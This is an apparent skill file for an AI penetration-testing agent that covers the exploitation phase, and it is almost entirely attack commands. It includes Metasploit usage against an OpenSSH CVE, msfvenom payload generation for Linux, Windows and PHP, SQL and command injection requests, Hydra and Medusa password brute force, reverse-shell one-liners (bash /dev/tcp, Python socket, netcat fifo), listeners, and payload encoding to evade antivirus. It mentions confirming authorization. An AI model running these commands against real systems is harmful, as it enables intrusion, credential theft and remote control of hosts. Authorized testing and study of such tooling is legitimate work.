exploit/SKILL.md
Exploitation framework for penetration testing — Metasploit, public exploits, and manual exploitation. Use when: user asks to exploit a vulnerability, get a shell on a target, run an exploit for a CVE, gain access, compromise a host, attempt exploitation, or deliver a payload. This is the attack phase — systems may be affected. NOT for: vulnerability analysis (use vuln skill), scanning (use enum skill), or post-exploitation (use post skill).
Install this skill globally with one command:

```bash
npx skillsauth add duriandurino/openclawrino exploit
```
Execute exploits against confirmed vulnerabilities. Confirm authorization before any exploitation.
✅ USE this skill when:
❌ DON'T use this skill when:
Before any exploitation:
Raspberry Pi 5B note: Physical access is in scope. USB/HDMI/GPIO attacks may affect the device state. Document before/after state.
From vuln analysis findings:
```bash
# Search Metasploit for a matching module by CVE
msfconsole -q -x "search cve:2024-6387; exit"
# Or search by service
msfconsole -q -x "search type:exploit name:openssh; exit"
```
```
# Launch msfconsole (quiet mode)
msfconsole -q
# Select exploit
use exploit/linux/ssh/regreSSHion_rce
# Set target
set RHOSTS 192.168.1.105
set RPORT 22
# Set payload and listener
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
# Run
exploit
# Check if we got a shell (run inside the new session)
whoami
id
hostname
```
```
# Start
msfconsole -q
# Search modules
search cve:2024-6387
search type:exploit name:openssh
search type:auxiliary name:smb
# Use module
use exploit/linux/ssh/regreSSHion_rce
# Configure
show options
set RHOSTS 192.168.1.105
set RPORT 22
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
show targets
set TARGET 0
# Run
exploit -j    # Background job
exploit       # Foreground
# Sessions
sessions -l   # List sessions
sessions -i 1 # Interact with session 1
sessions -k 1 # Kill session 1
```

```bash
# Generate payloads (standalone, from the shell)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o payload.elf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o payload.exe
msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o payload.php
```
When Metasploit doesn't have a module:
```bash
# Find and download exploit
searchsploit openssh 8.2
searchsploit -m 49757   # Mirror to current dir
# Review exploit code before running
cat 49757.py
# NEVER run exploits blindly — understand what they do
# Execute
python3 49757.py 192.168.1.105 22
```
```bash
# SQL injection (manual)
curl -s "http://target/login.php?user=admin'--"
# Command injection
curl -s "http://target/ping.php?ip=127.0.0.1;id"
# File upload bypass (form field name and filename are placeholders)
curl -F "<field>=@<file>" http://target/upload.php
```
```bash
# Hydra brute force (SSH)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.105
# Hydra FTP
hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.105
# Medusa
medusa -h 192.168.1.105 -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
```
```bash
# Bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Netcat
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <IP> <PORT> > /tmp/f
```
| Scenario | Payload |
|----------|---------|
| Linux target, need stable shell | linux/x64/meterpreter/reverse_tcp |
| Linux target, quick check | linux/x64/shell_reverse_tcp |
| Windows target | windows/x64/meterpreter/reverse_tcp |
| PHP web shell | php/meterpreter_reverse_tcp |
| One-liner, no file | linux/x64/shell_reverse_tcp (stageless) |
| Encoded (avoids basic AV) | linux/x64/meterpreter/reverse_tcp + encoder |
```bash
# Metasploit handler
msfconsole -q -x "
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit -j
"
# Simple netcat listener
nc -lvnp 4444
# rlwrap for a better shell (line editing and history)
rlwrap nc -lvnp 4444
```
Save exploitation results to engagements/<target>/exploit/ following the workspace engagement structure. The orchestrator will specify the target name. Preserve original filenames. NEVER create ad-hoc directories.